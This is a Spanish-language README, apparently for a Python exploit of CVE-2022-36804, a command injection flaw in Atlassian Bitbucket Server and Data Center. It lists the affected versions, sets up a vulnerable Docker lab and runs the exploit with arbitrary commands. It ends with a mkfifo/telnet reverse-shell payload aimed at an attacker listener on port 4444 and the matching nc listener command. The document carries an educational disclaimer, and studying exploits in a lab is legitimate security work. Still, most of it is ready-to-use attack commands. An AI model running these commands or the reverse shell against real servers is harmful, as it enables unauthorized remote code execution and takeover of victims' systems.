
Exploit en Python para CVE-2022-36804, una inyección de comandos en Atlassian Bitbucket Server y Data Center, que permite ejecución remota de código con permisos de lectura.
⚠️ Solo con fines educativos y de investigación de seguridad autorizada
Muy agradecido al autor original del PoC Walnut Security Services Pvt. Ltd
Varios endpoints de API en Atlassian Bitbucket Server y Data Center 7.0.0 antes de la versión 7.6.17, desde la versión 7.7.0 antes de la versión 7.17.10, desde la versión 7.18.0 antes de la versión 7.21.4, desde la versión 8.0.0 antes de la versión 8.0.3, desde la versión 8.1.0 antes de la versión 8.1.3, y desde la versión 8.2.0 antes de la versión 8.2.2, y desde la versión 8.3.0 antes de 8.3.1 permite a atacantes remotos con permisos de lectura en un repositorio público o privado de Bitbucket ejecutar código arbitrario mediante el envío de una solicitud HTTP maliciosa. Esta vulnerabilidad fue reportada a través de nuestro Programa de Bug Bounty por TheGrandPew.
Primero, clona el repositorio
git clone https://github.com/asepsaepdin/CVE-2022-36804.git
Cambia de directorio
cd CVE-2022-36804
Construye el contenedor vulnerable
docker build -t CVE-2022-36804 .
Ejecuta el contenedor efímero
docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
Verifica la dirección IP del contenedor
docker inspect CVE-2022-36804 | grep "IPAddress"
Configura Atlassian Bitbucket y crea un nuevo repositorio público abriendo la URL: http://172.17.0.3:7990
Verifica la Ejecución Remota de Código (RCE)
python3 cve-2022-36804.py -u http://172.17.0.3:7990
Verifica RCE con un comando personalizado (cmd)
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
Desde la perspectiva de un atacante, la ejecución remota de código es crítica para obtener acceso a un shell interactivo. Por lo tanto, ejecutar el siguiente comando activaría una reverse shell de telnet sobre TCP basada en bash hacia el sistema del atacante en el puerto 4444/tcp:
python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
nc -nlvp 4444